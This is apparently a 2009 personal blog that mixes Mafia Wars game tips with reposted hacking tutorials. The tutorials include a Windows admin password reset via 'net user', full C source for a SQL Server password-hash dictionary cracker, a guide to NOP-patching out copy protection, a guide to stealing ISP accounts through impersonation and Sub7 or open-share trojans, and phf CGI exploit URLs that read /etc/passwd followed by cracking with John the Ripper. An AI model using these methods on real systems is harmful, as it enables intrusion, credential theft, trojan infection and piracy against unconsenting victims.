Simple Tip to Remember in Starting Mafia WarsHere is a simple tip that you really have to consider when you start playing Mafia Wars for the first tim

Posted by hassan cheema on Wednesday, September 16, 2009
/ Comments: (0)










In the beginning of this game, the first thing you need to do is to choose among 3 types of Mafia characters which are Mogul, Fearless, and Maniac. Mogul is the type of character which earns money faster. Fearless recovers health faster. Maniac recovers energy faster. Now the question is, which among these 3 Mafia characters is the best choice in starting the game?!


The answer is the Maniac. Why?! Since Maniac recovers energy faster, this is a great advantage in playing the game. To level up your Mafia character, you need to do different jobs to gain experience and to earn money. But what you need to do a job is energy. The more the energy, the more jobs you can do. You earn more money when you do more jobs so choosing a Mogul is not that a wise decision. Maximum health points can be improved when you level up so you really need more energy in playing and enjoying the game.

enjoy n keep visiting my site.,

Read more
Posted by hassan cheema
/ Comments: (0)








When you’re playing Mafia Wars, one of the problems that you encounter is when you run out of cash. But cash is really important because you need to this in order to buy some stuff which you need to do in performing jobs and in some boss fights. Now the question is what is the advisable thing to do when you run out of cash?!
If you’re stuck into those jobs which are not suitable for your level just because you still can’t afford to buy the requirements for you to advance, the best thing to do is to perform the available jobs as much as possible and raise some funds. But you also have to remember that not all of those jobs are paying the same amount. Remember to choose a job which pays a high amount. It doesn’t matter even if you already mastered the job, what is important is you spend your energy in a productive way.


In this list of available jobs, notice that one of the jobs is already mastered. But if you compare the amount of cash you will earn in these jobs, you can see that the last one pays the most ($2,000 – $5,000). So even if the job has been mastered, you can still do it over and over again to earn more cash for you to buy the next requirements.

enjoy n keep visiting my site for more.,

Read more

computer adminstrator password hack

Posted by hassan cheema on Saturday, September 12, 2009
/ Comments: (0)
Go to Start-->Run and type "cmd" to open the command promptType "net user" and press enter to see all the accounts name
Type "net user (account name) *"
Type the password you want and then confirm it!!
Read more

retrieve sql password

Posted by hassan cheema on Monday, August 17, 2009
/ Comments: (0)
NGSSoftware Insight Security Research How does SQL Server store passwords?
SQL Server uses an undocumented function, pwdencrypt() to produce a hash of the user's password, which is stored in the sysxlogins table of the master database. This is probably a fairly common known fact. What has not been published yet are the details of the pwdencrypt() function. This paper will discuss the function in detail and show some weaknesses in the way SQL Server stores the password hash. In fact, as we shall see, later on I should be saying, 'password hashes'.
What does an SQL password hash look like?
Using Query Analyzer, or the SQL tool of your choice, run the following query
select password from master.dbo.sysxlogins where name='sa'
You should get something that looks similar to the following returned.
0x01008D504D65431D6F8AA7AED333590D7DB1863CBFC98186BFAE06EB6B327EFA5449E6F649BA954AFF4057056D9B
This is the hash of the 'sa' login's password on my machine.
What can we derive from pwdencrypt() about the hash?
Time
The query
select pwdencrypt('foo')
produces
0x0100544115053E881CA272490C324ECE22BF17DAF2AB96B1DC9A7EAB644BD218969D09FFB97F5035CF7142521576
but several seconds later repeating the query
select pwdencrypt('foo')
produces
0x0100D741861463DFFF7B5282BF4E5925057249C61A696ACB92F532819DC22ED6BE374591FAAF6C38A2EADAA57FDF
The two hashes are different and yet the input, ‘foo’, is the same. From this we can deduce that time must play an important part in the way password hashes are created and stored. The design reasons behind this will be such that if two people use the same password then their hashes will be different - thus disguising the fact that their passwords are the same.
2 NGSSoftware Insight Security Research
Case
Run the query
select pwdencrypt('AAAAAA')
which produces
0x01008444930543174C59CC918D34B6A12C9CC9EF99C4769F819B43174C59CC918D34B6A12C9CC9EF99C4769F819B
Now, we can note that there are probably two password hashes here. If you can't spot it immediately let me break it down
0x0100
84449305
43174C59CC918D34B6A12C9CC9EF99C4769F819B
43174C59CC918D34B6A12C9CC9EF99C4769F819B
As can be seen, the last 40 characters are the same as the penultimate 40 characters. This suggests that passwords are stores twice. One of them is the normal case sensitive password and the other is the upper-cased version of the password. This is not good as any one attempting to crack SQL passwords now has an easier job. Rather than having to break a case sensitive password they need only go after the upper-cased version. This reduces the number of characters they need to attempt considerably.
Clear Salt
From what we know already, that changes in time will produce a change in the hash, there must be something about time that makes the password hashes different and this information must be readily available so when someone attempts to login a comparison can be performed against the hash derived from the password they supply and the hash stored in the database. In the breakdown of results from pwdencrypt() above the 84449305 portion is this piece of information.
This number is derived in the following fashion. The time () C function is called and used as a seed passed to the srand() function. srand() sets a start point to be used for producing a series of (pseudo)random numbers. Once srand is seeded the rand() function is called to produce a pseudo random number. This number is an integer; however SQL server converts this to a short and sets it aside. Lets call this number SN1. The rand() function is called again producing another pseudo random integer which, again, is converted into a short. Let's call this number SN2. SN1 and SN2 are joined to produce an integer. SN1 becoming the most significant part and SN2 the least significant part : SN1:SN2 to produce a salt. This salt is then used to obscure the password.
Hashing the password
The user's password is converted to it's UNICODE version if not already in this form. The salt is then appended to the end. This is then passed to the crypt functions in advapi32.dll to produce a hash using the secure hashing algorithm or SHA. The password is then converted to its upper case form, the salt tacked onto the end and another SHA hash is produced.
0x0100 Constant Header
84449305 Salt from two calls to rand()
43174C59CC918D34B6A12C9CC9EF99C4769F819B Case Sensitive SHA Hash
43174C59CC918D34B6A12C9CC9EF99C4769F819B Upper Case SHA Hash
3 NGSSoftware Insight Security Research
The Authentication Process
When a user attempts to authenticate to SQL Server several things happen to do this. Firstly SQL Server examines the password entry for this user in the database and extracts the "salt" - 84449305 - in the example. This is then appended to the password the user supplies when attempting to log in and a SHA hash is produced. This hash is compared with the hash in the database and if they match the user is authenticated - and of course if the compare fails then the login attempt fails.
SQL Server Password Auditing
This is done in the same manner that SQL Server attempts to authenticate users. Of course, by far the best thing to do is, first off, is attempt to brute force the hash produced from the upper-cased version. Once this has been guessed then it is trivial to workout the case sensitive password.
Source Code for a simple command line dictionary attack tool
/////////////////////////////////////////////////////////////////////////////////
//
// SQLCrackCl
//
// This will perform a dictionary attack against the
// upper-cased hash for a password. Once this
// has been discovered try all case variant to work
// out the case sensitive password.
//
// This code was written by David Litchfield to
// demonstrate how Microsoft SQL Server 2000
// passwords can be attacked. This can be
// optimized considerably by not using the CryptoAPI.
//
// (Compile with VC++ and link with advapi32.lib
// Ensure the Platform SDK has been installed, too!)
//
//////////////////////////////////////////////////////////////////////////////////
#include
#include
#include
FILE *fd=NULL;
char *lerr = "\nLength Error!\n";
int wd=0;
int OpenPasswordFile(char *pwdfile);
int CrackPassword(char *hash);
int main(int argc, char *argv[])
{
int err = 0;
4 NGSSoftware Insight Security Research
if(argc !=3)
{
printf("\n\n*** SQLCrack *** \n\n");
printf("C:\\>%s hash passwd-file\n\n",argv[0]);
printf("David Litchfield (david@ngssoftware.com)\n");
printf("24th June 2002\n");
return 0;
}
err = OpenPasswordFile(argv[2]);
if(err !=0)
{
return printf("\nThere was an error opening the password file %s\n",argv[2]);
}
err = CrackPassword(argv[1]);
fclose(fd);
printf("\n\n%d",wd);
return 0;
}
int OpenPasswordFile(char *pwdfile)
{
fd = fopen(pwdfile,"r");
if(fd)
return 0;
else
return 1;
}
int CrackPassword(char *hash)
{
char phash[100]="";
char pheader[8]="";
char pkey[12]="";
char pnorm[44]="";
char pucase[44]="";
char pucfirst[8]="";
char wttf[44]="";
char uwttf[100]="";
char *wp=NULL;
char *ptr=NULL;
int cnt = 0;
int count = 0;
unsigned int key=0;
unsigned int t=0;
unsigned int address = 0;
unsigned char cmp=0;
unsigned char x=0;
HCRYPTPROV hProv=0;
HCRYPTHASH hHash;
5 NGSSoftware Insight Security Research
DWORD hl=100;
unsigned char szhash[100]="";
int len=0;
if(strlen(hash) !=94)
{
return printf("\nThe password hash is too short!\n");
}
if(hash[0]==0x30 && (hash[1]== 'x' hash[1] == 'X'))
{
hash = hash + 2;
strncpy(pheader,hash,4);
printf("\nHeader\t\t: %s",pheader);
if(strlen(pheader)!=4)
return printf("%s",lerr);
hash = hash + 4;
strncpy(pkey,hash,8);
printf("\nRand key\t: %s",pkey);
if(strlen(pkey)!=8)
return printf("%s",lerr);
hash = hash + 8;
strncpy(pnorm,hash,40);
printf("\nNormal\t\t: %s",pnorm);
if(strlen(pnorm)!=40)
return printf("%s",lerr);
hash = hash + 40;
strncpy(pucase,hash,40);
printf("\nUpper Case\t: %s",pucase);
if(strlen(pucase)!=40)
return printf("%s",lerr);
strncpy(pucfirst,pucase,2);
sscanf(pucfirst,"%x",&cmp);
}
else
{
return printf("The password hash has an invalid format!\n");
}
printf("\n\n Trying...\n");
if(!CryptAcquireContextW(&hProv, NULL , NULL , PROV_RSA_FULL ,0))
{
if(GetLastError()==NTE_BAD_KEYSET)
{
// KeySet does not exist. So create a new keyset
if(!CryptAcquireContext(&hProv,
6 NGSSoftware Insight Security Research
NULL,
NULL,
PROV_RSA_FULL,
CRYPT_NEWKEYSET ))
{
printf("FAILLLLLLL!!!");
return FALSE;
}
}
}
while(1)
{
// get a word to try from the file
ZeroMemory(wttf,44);
if(!fgets(wttf,40,fd))
return printf("\nEnd of password file. Didn't find the password.\n");
wd++;
len = strlen(wttf);
wttf[len-1]=0x00;
ZeroMemory(uwttf,84);
// Convert the word to UNICODE
while(count < len)
{
uwttf[cnt]=wttf[count];
cnt++;
uwttf[cnt]=0x00;
count++;
cnt++;
}
len --;
wp = &uwttf;
sscanf(pkey,"%x",&key);
cnt = cnt - 2;
// Append the random stuff to the end of
// the uppercase unicode password
t = key >> 24;
x = (unsigned char) t;
uwttf[cnt]=x;
cnt++;
t = key << 8;
t = t >> 24;
7 NGSSoftware Insight Security Research
x = (unsigned char) t;
uwttf[cnt]=x;
cnt++;
t = key << 16;
t = t >> 24;
x = (unsigned char) t;
uwttf[cnt]=x;
cnt++;
t = key << 24;
t = t >> 24;
x = (unsigned char) t;
uwttf[cnt]=x;
cnt++;
// Create the hash
if(!CryptCreateHash(hProv, CALG_SHA, 0 , 0, &hHash))
{
printf("Error %x during CryptCreatHash!\n", GetLastError());
return 0;
}
if(!CryptHashData(hHash, (BYTE *)uwttf, len*2+4, 0))
{
printf("Error %x during CryptHashData!\n", GetLastError());
return FALSE;
}
CryptGetHashParam(hHash,HP_HASHVAL,(byte*)szhash,&hl,0);
// Test the first byte only. Much quicker.
if(szhash[0] == cmp)
{
// If first byte matches try the rest
ptr = pucase;
cnt = 1;
while(cnt < 20)
{
ptr = ptr + 2;
strncpy(pucfirst,ptr,2);
sscanf(pucfirst,"%x",&cmp);
if(szhash[cnt]==cmp)
cnt ++;
else
{
break;
}
}
if(cnt == 20)
{
8 NGSSoftware Insight Security Research
// We've found the password
printf("\nA MATCH!!! Password is %s\n",wttf);
return 0;
}
}
count = 0;
cnt=0;
}
return 0;
}
Read more

HOW TO CRACK ANY TYPE OF SOFTWARE PROTECTION

Posted by hassan cheema
/ Comments: (0)
In this tutorial you will learn how to crack any type of software protection using W32Dasm and HIEW.

IDENTIFYING THE PROTECTION:
Run the program, game, etc., (SoftwareX) that you want to crack without the CD in the CD reader. SoftwareX will not run of course, however, when the error window pops up it will give you all of the vital information that you need to crack the program, so be sure to write down what it says.

CRACKING THE PROTECTION:
Now, run Win32Dasm. On the file menu open DISASSEMBLER > OPEN FILE TO DISASSEMBLE. Select SoftwareX’s executable file in the popup window that will appear (e.g. SoftwareX.exe). W32Dasm may take several minutes to disassemble the file.

When W32Dasm finishes disassembling the file it will display unrecognizable text; this is what we want. Click on the String Data References button. Scroll through the String Data Items until you find SoftwareX’s error message. When you locate it, double click the error message and then close the window to return to the Win32Dasm text. You will notice that you have been moved somewhere within the SoftwareX’s check routine; this is where the error message in generated.

Now comes the difficult part, so be careful. To crack SoftwareX’s protection you must know the @offset of every call and jump command. Write down every call and jump @offset number that you see (You have to be sure, that the OPBAR change its used color to green). You need the number behind the @offset without the “h.”

Now open HIEW, locate SoftwareX’s executable, and press the F4 key. At this point a popup window will appear with 3 options: Text, Hex, and Decode. Click on “Decode” to see a list of numbers. Now press the F5 key and enter the number that was extracted using Win32Dasm. After you have entered the number you will be taken to SoftwareX’s check routine within HIEW.

To continue you must understand this paragraph. If the command that you are taken to is E92BF9BF74, for example, it means that the command equals 5 bytes. Every 2 digits equal one byte: E9-2B-F9-BF-74 => 10 digits => 5 bytes. If you understood this then you can continue.

Press F3 (Edit), this will allow you to edit the 10 digits. Replace the 5 bytes with the digits 90. In other words, E92BF9BF74 will become 9090909090 (90-90-90-90-90). After you complete this step press the F10 key to exit.

Congratulations! You just cracked SoftwareX!

Don’t panic if SoftwareX will not run after you finished cracking it. It only means that something was done incorrectly, or perhaps SoftwareX’s protection technology has been improved or created after this tutorial. Simply reinstall SoftwareX and start over. If you’re sure that you completed all steps correctly and the program still will not run, then tough nuts. Their protection was developed after the writing of this tutorial.
Read more

Stealing ISP Accounts

Posted by hassan cheema on Wednesday, August 12, 2009
/ Comments: (0)
Stealing ISP Accounts




Why would you want a stolen ISP account u ask?? well there are two reasons, you are too poor to afford the local phone companies bull shit prices or you need an easier and faster platform to hack from than five proxies and three wingates, well here is your answer. Remember there is no point in going out and hacking your local ISP to get an account, the easier the better is my suggestion.

Now firstly you may be reading this at school or from somewhere and you dont have access at home so now i will show you some of the method's i have used to gain accounts. One of the most simple method's is to go to a local shop and find a computer on dialup access, then simply run a password snatcher on it such as WASP and then emailing all the information outside where you can proccess it, this method is relatively simple and if you get caught they just chuck you out of the store. These accounts are normally only good for night access, we want 24/7 access. One method i have found works is ringing up the local ISP and asking to purchase an account, say you are in a rush but make sure you dont sound fake, they normally say "here is your internet username and password, we will send out the information for you to send back blah blah blah..." now ofcourse you have to make sure you call without Caller ID active, if you live in australia just prefix your number with 1831. This method can be rather annoying and normally doesnt work, but it is worth a try and the account normally last's for a few weeks. My favourite method is one of great effort but also great reward, find a local computer store that is overpriced and offers all that extended warranty crap, now get yourself a shit and screen print their logo on it, now get a list of people who purchase computers from there, or just follow people home. Now that we have five or six people who are stupid enough to pay 600% of the price for a computer than they should, go around there houses and pose as a computer repair guy sent out from the store, say something like, this is part of the extended life warranty you purchased with your computer, we are just performing a regular checkup as we have had a few problems with your model of computer. nine times out of ten they will let you straight through the door without even asking any questions to do with abacus, just the mere thought of their overpriced piece of crap not working makes them do whatever you want, now when you are in just run a program through there computer and snatch there internet accounts, it doesnt matter who they are for, just the we will get more later with these ones. Make sure you stay for an hour or so and run scandisk and defrag to make it look real. Now unless you are really stupid you should have around five or six internet accounts.

Now when you dial up to them make sure you turn of Caller ID, this is what stop's you from being pinned straight away, check the person's email and remove any multiple logging reports and make sure you change internet accounts ATLEAST once a week and never use the old one again, give it to some lamer over the net and let them get in trouble for your hack's. You should be on the net by now, but to change accounts once a week we really need more accounts, i hate to say it but the easiest way to get more accounts in by using winblows, so fire up winblows and ignore all the illegal operation crap and download the following program's:

Legion - Open Share Scanner
Sub 7 Defcon edition
Sub 7 2.2
mIRC


Now open up mIRC and go to a local area's channel, /whois a few people until you find the isp you like.

Infinity is freestyler@12-237-182-191.client.attbi.com * BoMFunk Mc'S

So we have made our choice, attbi.com reveal ATT&T, now do a /dns on 12-237-182-191.client.attbi.com as this is his host.

*** Resolved 12-237-182-191.client.attbi.com to 12.237.182.191

Now convert this into a class B network and we have 12.237.0.0, this is our target, open up Sub 7 2.2 and goto Connection > Scanner > Local Scanner. Put the Start ip as 12.237.0.0 and the end ip as 12.237.255.255, then click scan. This will take quite a while, now when you get a result open up Sub 7 Defcon and put it in the field up the top and click connect. If you get asked for a password then dont bother with this IP, but if it comes up with connected at the bottom we are in business. First thing you should do is goto Advanced > Passwords > Retrieve RAS Passwords, this is there internet username and password aswell as phone number, make sure you get you local phone number from the ISP's site. Next goto Connection > Server Options and set a password, we dont want other people getting on the net while we are hacking and kicking us off. Turn on IP Notify aswell so that you can get this server to do remote scan's for you if needed, ISP's sometimes check for people who scan and bust their ass.

To anyone who says using Sub 7 is a lame way to get accounts, i agree but i would rather this way than hacking my local ISP and getting put in jail before i even get to my target. You ask why you use Sub 7 2.2 just for scanning?? well its a better scanner than Defcon, but it doesnt allow IRC bot's or IP Notify.

The Next way to gain accounts is to find open shares and upload a trojan. To do this open up legion scanner and do a scan of the same range as you did with sub 7, expect do it in small ammounts like 203.48.0.0 - 203.48.5.255,when it comes up with a result go into my computer and change the address to \\ and then the ip, so for example \\203.48.15.123 then wait for it to load, you might get asked for a password, if so ignore this ip and continue scanning, if you dont get a password, have a look at the names, look for the C drive if it is there and go into it, then go into windows > start menu > programs > startup, and paste a trojan server in here, make sure it doesnt come up with a prompt and that it will notify you when they get on the net next. All you have to do now is wait, within a few day's you should be able to get atleast 20-30 accounts, if not around 50. This should last for a long time and you can do anything you want with them. Just remember to disable Caller ID and to change accoutns every week atleast.

DO NOT fuck with the person you get the account from, keep your stealth and dont advertise the fact you dont pay for internet, or the fact you hack from other peoples accounts.

Greetz go out to jimmyj, Opticon, harper, Dead_Beat, Digicrime, Zaleth, Sangoma and everyone i forgot...
Read more

-***Hacking Web Pages***-

Posted by hassan cheema
/ Comments: (0)
Introduction Please know that hacking webpages is consitered lame in many's opinions, and it will most likly not give you a good reputation. People can always check logs once notified of hacking and most likly your address will come up and then at worst they will press charges for some elaborate computer crimes law and you willgoto prison for up to 10 years and owe alot of $. So please attempt to refrain from abusing your knowlage on this subject. This is for informational purposesonly.
"Free" Web Pages
Free webpages is web page hosting companieslike Tripod and Geocities that host peoples web pagesfor free and make money off advertising. There is waysto hack these companies and have access to all users,but it would be to complex for most people. This way is simply social engineering which is not very hard todo, so don't proclaim yourself an Uberhacker because you vandalised a poor guy's webpage, who just happened to have his information on his site. All you have to dois set up an account with a free email service like hotmail and find your target. On your targets page up need to have the date of birth, name, and their old email, or instead of the DOB there address (I have lostmy pass to a smaller company, and they needed the address i had registered with). All these free web pagecompanies have their "verification" for people who havelost there password to their page. All their is to it is once you have this information is you either email the company telling them you changed your email addressand once that is done wait about 2 weeks and then emailthem again saying that you lost your password. Most willemail you telling you that you need some sort of verification, like the DOB or Address. In which you email them back and tell them and get a new password. On the other hand, companies like Geocities are too busy for email so they have set up a web site where members can get there password back (http://www.geocities.com/help/pass_form.html).
User's Pages
There is many different methods of hacking usersweb pages on a server. I will attempt to list as manyways possible but don't expect very much in depth information. Getting Passwords Okay suppose you found a page you want to hack, that is on someone elses server thats a basic server, light security. Okay very light security. I will be truthful. This pretty much works on servers with no security [=.Getting a passwd file is pretty easy. Simply telnet into the servers FTP anonymously and look in the ETC directory and get the file called Passwd.Another way to get them is to find your target and in a WWW browser type cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd after the servers name. For example the name may be http://www.hackme.com/, you would gotohttp://www.hackme.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd except instead of www.hackme.com you would replace that with your targets URL.You may get a passwd file that has no user accounds,but only defaults which where the encrypted password should be a * would be in its place. On certain serverswith this you may have a shadowed passwd but on all passwd files i have come across there is some user names like FTP and NEWS that have no encrypted passwordswhich is replaced with *. If you find only this and noencrypted passwds you probably have found a fixed passwd file and you must try another method of hackingthe server. You need to examine this file and look for a line in the text that looks like this:rrc:uXDg04UkZgWOQ:201:4:Richard Clark:/export/home/rrc:/bin/kshdoes not need to look exactly like that, the only important part it needs it the uXDg04UkZgWOQ and rcc, which is the login part. Get a program called John the Ripper whcih can be found on any hacking site on the web. If you are to lazy, or stupid to find one on the web heres a good place to go for newbies http://www.hackersclub.com/km/I will not go in depth right here on passwd files, but ihave written a text on passwd's going good into the subject which can be found at http://www.xtalwind.net/~lmclaulin/ugpasswd.txt.Anyway, using John the Ripper is easy, if you want toquickly hack something give the command (in DOS prompt)"john passwd -single" Replace "passwd" in there withthe name of the passwd file, you may have saved it as passwd.txt or something. An important thing to rememberis that the passwd file needs to be in the same directory as John. To see a list of other methods for cracking a passwd file, just type John and it will giveyou a list of commands. I have found john won't workfor me with wordlists but other people say that it works fine for them. You can use incremental mode (to use that the command is "John passwd -incremental"It takes like a few days to finish so I wouldn't reallywant it to let it go on forever and ever if it was just some normal passwd file. Unless its like NASA's passwd file (keep dreaming, they probably change passwords everyday and that file is very outdated)I wouldn't want to use that too much. To see a complete list of John's cracking capabilities, justtype john and it will give you a list of commands that you may use.

If you Have an Account with the Users Server
The next section is on how you can hack a webpage ifyou already have an account with the server.
This was taken from a text by Lord Somer and since i don't want to butcher something important out of it I will just keep the text in its whole form. Exploiting Net Adminstration CGI (taken from a text by Lord Somer) ####################################### # Exploiting Net Administration Cgi's # # like nethosting.com # # Written by:Lord Somer # # Date:9/2/97 # #######################################
Well since nethosting.com either shutdown or whatever I figured what the hell before I forgethow I did the more recent hacks etc... I'd tell you how so maybe you'll find the same sys elsewhere or be able to use it for ideas.
Basically Nethosting.com did all it's administration via cgi's at net-admin.nethosting.com,well you need an account, card it if necessary, log in to net-administration, you'll see craplike ftp administration, email, etc... who really cares about e-mail so we'll go to ftp.Click on ftp administration. Lets say you were logged in as 7thsphere.com your url would be something like: http://net-admin.nethosting.com/cgi-bin/add_ftp.cgi?7thsphere.com+ljad32432jl
Just change the 7thsphere.com to any domain on the sys or if in the chmod cgi just del that partbut keep the + sign and you edit the /usr/home dir. In the ftp administration make a backdooraccount to that domain by creating an ftp who's dir is / since multiple /// still means /.
Once you have your backdoor have fun. Oh yeah and in the email you can add aliases like I didto rhad's e-mail account at 7thsphere, why the hell is he on that winsock2.2 mailing list?
Well the basic theory of this type of exploitation is that:- the cgi is passed a paramater which we change to something else to edit it's info- since it uses the stuff after the + to check that it's a valid logged in account(like hotmail does), it dosen't check the password again.- multiple ///'s in unix just mean a /, thus we can get access to people's dir or the entire /usr/home dir
I used this method for hacking a few well known places:7thsphere.comsinnerz.comhawkee.comwarez950.orglgn.comand several other unknown sites.
Please remember if you ever use a method of mine please credit me and link to my site thanks.
######################################### Contact Info: ## E-mail: webmaster@lordsomer.com ## ICQ: 1182699 ## Site: The Hackers Layer ## http://www.lordsomer.com ## Other Sites: ## Hackers Club ## http://www.hackersclub.com/km #########################################
Other Ways Of Hacking User Pages
Another method that may work with really stupid Admins is sometimes, when you FTP to a server, you can leave your home directory and go back a few directoriesand find your targets directory. Once you have done that if you can access the HTML files and save them to disk and then "edit them". The HTML files may or may not be stored on FTP but with smarter admins they are not accessable by other users.
Things that Don't Fit In Other Catagories
There are many more ways of hacking web pages. Peoples stupidity is a good way. Many passwords are guessable if they are not hackable. Its not hacking but simply using a persons stupidity. If you were to get root on a server you could have access to everything on the server, so if you wanted to hack a servers webpage (or access anything else you want onthe server) you would probably have to get an account and you could run an exploit on the server, but that is something newbies should probably not try until youknow more about what you are doing.
Why Hacking Web Pages (and other things) is aBad Idea...
Hacking web pages is an obvious signal that someone has hacked your server, which can reminer to forgetful admins to check there logs and immediatly callyour ISP to cancel your account along with the FBI to come bust you on some elaborate computer crime law. Hacking school grades is another stupid thing you shouldnever do. I know its off topic but its important to remember, because they are two things that both get people busted alot. Don't believe me? Let me show you afew pieces of articles from news at the hackersclub. The entire article (instead of the parts where the hacker got busted) may be read from the address beneath each section.
"Kubojima is accused of taking over seven web pages of theOsaka-based television network Asahi Broadcasting Company on May18 and replacing five of the seven weather charts on the pages withpornographic pictures. He also faces charges under Japan's anti-obscenity laws.
If convicted, Kubojima faces a fine of one million yen ($8,600) and a prison term of up to five years under tough penalties against hackers adopted in 1992. "
http://web5.hackersclub.com/km/news/1997/may/news4.txt
"He is 18, and may be looking at up to 10 years in prison. He hasn't stolen anything, he hasn't hurt anybody and many familiarwith the crime that he is accused of committing say the possiblepunishment borders on the absurd.
The 18-year-old and a 17-year-old friend, police say, broke into a computer network.
They added some funny pictures to a World Wide Web site run bythe network operator, a Texas Internet service provider calledFlashNet, police say. The two figured out some of the user names andpasswords used by FlashNet customers.
Then they left.
The 18-year-old was arrested on suspicion of third-degree feloniesthat carry a sentence of two to 10 years in prison and a fine of up to$10,000. His friend, who was arrested on suspicion of a less severemisdemeanor, faces up to a year in jail and a $4,000 fine. "
http://web6.hackersclub.com/km/news/1997/august/news3.txt
"Student faces felony for hacking grades
>From NewsTalk 750 WSB
A 15-year-old Florida High School student faces felony charges for allegedly hacking his way into the school computer to change "F's" into "A's." Jason Westerman claims it was only a joke, but he faces felony charges for offenses against intellectual property and computer users. He's been suspended for ten days. Westwood high school administrators want to expel him. "
http://web6.hackersclub.com/km/news/1997/june/news4.txt
Getting busted hacking will not be a fun process unless you like paying $10,000 and having a date with someone names Spike in the prison's cafateria for the next 3 years. Be wise about what you leave behind, because soon you may be suprised by a knock at the doorby your neighborly FBI agent.
Read more

Hacking Servers

Posted by hassan cheema
/ Comments: (0)
Hacking Servers:

I am asked at least 5 or more times a day by young, beginning"hackers", "How can I hack?" or "Is there a way to hack a web site?"Well there is. There are, in fact, literally hundreds of ways to do this. Iwill discuss a few in this text to get you started. Every hacker has to startsomehow and hacking web servers and ftp servers is one of the easiest ways.If you are reading this I am assuming that you already have a basic knowledgeof how web servers work and how to use some form of UNIX. But I am going toexplain that stuff anyway for those of you who don't know.

Part 1: Simple UNIX Commands
Most DOS commands have UNIX and Linux equivalents. Listed below aresome of the main commands you will need to know to use a shell account.
HELP = HELPCOPY = CPMOVE = MVDIR = LSDEL = RMCD = CD
To see who else is on the system you can type WHO. To get informationabout a specific user on the system type FINGER . Using those basicUNIX commands you can learn all you need to know about the system you areusing.
Part 2: Cracking Passwords
On UNIX systems the file that contains the passwords for all the userson the system is located in the /etc directory. The filename is passwd. I betyour thinking...."Great. All I have to do is get the file called /etc/passwdand I'll be a hacker." If that is what you are thinking then you are deadwrong. All the accounts in the passwd file have encrypted passwords. Thesepasswords are one-way encrypted which means that there is no way to decryptthem. However, there are programs that can be used to obtain passwords fromthe file. The name of the program that I have found to be the best passwordcracker is called "Cracker Jack." This program uses a dictionary file composedof thousands of words. It compares the encrypted forms of the words in thelist to the encrypted passwords in the passwd file and it notifies you whenit finds a match. Cracker Jack can be found at my web site which is athttp://www.geocities.com/SiliconValley/9185 Some wordlists can be found at the following ftp site: sable.ox.ac.uk/pub/wordlists. To get to the wordlist that I usually use goto that ftp sitethen goto the American directory. Once you are there download the file calleddic-0294.tar.Z which is about 4 MB. To use that file it must be uncompressedusing a program like Gzip for DOS or Winzip for Windows. After uncompressingthe file it should be a text file around 8 MB and it is best to put it in thesame directory as your cracking program. To find out how to use Cracker Jackjust read the documentation that is included with it.
Part 3: The Hard Part (Finding Password Files)
Up till now I have been telling you the easy parts of hacking aserver. Now we get to the more difficult part. It's common sense. If thesystem administrator has a file that has passwords for everyone on his or hersystem they are not going to just give it to you. You have to have a way toretrieve the /etc/passwd file without logging into the system. There are 2simple ways that this can sometimes be accomplished. Often the /etc directoryis not blocked from FTP. To get the passwd file this way try using an FTPclient to access the site anonymously then check the /etc directory to see ifaccess to the passwd file is restricted. If it is not restricted then downloadthe file and run Cracker Jack on it. If it is restricted then try plan B. Onsome systems there is a file called PHF in the /cgi-bin directory. If thereis then you are in luck. PHF allows users to gain remote access to files(including the /etc/passwd file) over the world wide web. To try this methodgoto your web browser and type in this URL:http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwdThen substitute the site you are trying to hack for the xxx.xxx.xxx.For example, if I wanted to hack St. Louis University (and I have already) Iwould type in http://www.slu.edu/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Don't bother trying www.slu.edu because I have already done it and told themabout their security flaw.Here's a hint: try www.spawn.com and www.garply.com
If the preceding to methods fail then try any way you can think of to get thatfile. If you do get the file and all the items in the second field are X or !or * then the password file is shadowed. Shadowing is just a method of addingextra security to prevent hackers and other unwanted people from using thepassword file. Unfortunately there is no way to "unshadow" a password filebut sometimes there are backup password files that aren't shadowed. Trylooking for files such as /etc/shadow and other stuff like that.
Part 4: Logging In To "Your" New Shell
OK....This is where you use what you found using Cracker Jack.Usernames and passwords. Run your telnet client and telent to the server thatyou cracked the passwords for, such as www.slu.edu. When you are connected itwill give a login screen that asks for a login names and password and usuallyinformation on the operating system that the server is using (usually UNIX,linux, aix, irix, ultrix, bsd, or sometimes even DOS or Vax / Vms). Just typein the information you got after cracking the passwd file and whatever youknow about UNIX to do whatever you feel like doing. But remember that hackingisn't spreading viruses or causing damage to other computer systems. It isusing your knowledge to increase your knowledge.
Part 5: Newbie Info
If you feel that you have what it takes to be a serious hacker thenyou must first know a clear definition of hacking and how to be an ethicalhacker. Become familiar with unix environments and if you are only juststarting to learn to hack, visit a local library and find some books onvarious operating systems on the internet and how they work. Or you could goto a book store and buy a couple internet security books. They often explainhow hackers penetrate systems and that is something a beginner could use asan advantage.
Read more

Hacking Hotmail

Posted by hassan cheema
/ Comments: (1)
Hacking Hotmail
This article directly aims at exploiting a security vulnerability in msn messenger which lets a hacker to steal out hotmail password of a victim just by using some system registry information and making a simple keylogger program in any language like C or Visual basic.Before continuing I want you to think twice for execution of this method since it is direct hacking so you may be in trouble if caught.But as we people follow the principle of "NEVER GET CAUGHT" so what to think if you are a hacker J JPlease note that hacking hotmail according to this article involves the need of a executable (.exe) file which is available along with this file.Hacking hotmail through msn messenger using the trick file is the easiest one.It does not involves any complecated stuff of entering deep into the scripts or downloading the password file and then going for decryption using cracker programs.All you need to do is to send victim the trick file through msn messenger.When the victim executes the file its will show a fake out of memory error.Then just type in the following command;" ^ ^ " (without quotation sign.. only ^ ^ )
"space^space^space" (hope u got it) (without quotation mark)This command will log out the victim from msn messenger.When the victim logs back in just type anything and send to the victim through messenger and you will get the username and password of the victim.
AINT IT COOL.. This method is particularly intended for newbies.Guys experienced to hacking wont be busted by this method.I guess they wont run the file. If the victim doesn't run the file then this method wont work.
Read more